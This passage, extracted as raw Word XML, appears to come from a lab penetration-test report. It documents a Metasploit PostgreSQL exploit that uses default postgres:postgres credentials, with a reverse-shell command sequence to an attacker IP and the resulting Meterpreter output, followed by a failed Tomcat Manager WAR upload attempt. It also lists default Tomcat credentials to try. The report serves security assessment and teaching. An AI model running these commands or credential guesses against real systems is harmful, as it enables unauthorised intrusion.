            <w:tcW w:type="dxa" w:w="22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Metasploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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exploit/linux/postgres/postgres_payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target (RHOSTS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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10.0.2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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5432/tcp (PostgreSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Credentials Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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postgres : postgres (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="E2EFDA"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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="E2EFDA"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Meterpreter session established — SUCCESS ✔</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The representative command sequence for the PostgreSQL payload exploit is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; use exploit/linux/postgres/postgres_payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(linux/postgres/postgres_payload) &gt; set RHOSTS 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(linux/postgres/postgres_payload) &gt; set USERNAME postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(linux/postgres/postgres_payload) &gt; set PASSWORD postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(linux/postgres/postgres_payload) &gt; set LHOST &lt;attacker-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 exploit(linux/postgres/postgres_payload) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on &lt;attacker-IP&gt;:4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Meterpreter session 2 opened (&lt;attacker-IP&gt;:4444 -&gt; 10.0.2.9:xxxxx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit authenticates to PostgreSQL using the default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres:postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials. Once authenticated, it uses PostgreSQL's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY TO/FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function (or a similar mechanism) to execute a native code payload on the server, resulting in a Meterpreter session with database-level privileges, which can often be escalated to root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PostgreSQL exploitation screenshot is shown below:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="420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4200525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Metasploit PostgreSQL Payload Exploitation — Meterpreter Session Established on 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4  Attempt 3 — Apache Tomcat Manager WAR Upload (Failed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 13: Apache Tomcat Exploitation — Configuration and Result</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="1F3864"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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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Apache Tomcat — Manager Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Metasploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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exploit/multi/http/tomcat_mgr_upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target (RHOSTS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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10.0.2.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Target Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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8180/tcp (Apache Tomcat HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="FFE7E7"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Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>
            <w:shd w:fill="FFE7E7"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FAILED — Tomcat Manager interface not accessible ✗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Failure Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6827"/>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Tomcat Manager application was not reachable at the expected path or required authentication that was not bypassed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Tomcat Manager WAR upload exploit requires access to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/manager/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/manager/text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrative interface. This exploit failed because the Tomcat Manager was either not accessible or authentication could not be bypassed with the credentials attempted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is important to note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">the failure of this exploit does not confirm that the Tomcat service is secure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It only confirms that this particular exploitation vector did not succeed in this instance. The service should still be assessed for:</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Default Tomcat Manager credentials (tomcat:tomcat, admin:admin, etc.)</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Version-specific vulnerabilities in the identified Apache Tomcat version</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AJP protocol exposure on port 8009 (see CVE-2020-1938, "Ghostcat")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots of the Tomcat configuration issue and the exploitation attempt are shown below:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="49530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1390650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: Apache Tomcat Service — Configuration or Accessibility Issue Observed During Exploitation Attempt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="424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4248150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6: Metasploit Session Summary — Samba and PostgreSQL Sessions Active; Tomcat Attempt Failed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5  Configuration Issues Observed During Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">During the exploitation phase, configuration errors were observed in the initial Metasploit setup. These are documented transparently as they are instructive for understanding accurate module configuration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 14: Configuration Issues and Corrections</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9026"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:left w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:right w:val="single" w:color="2E74B5" w:sz="4"/>
          <w:insideH w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:insideV w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="1F3864"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20"/>
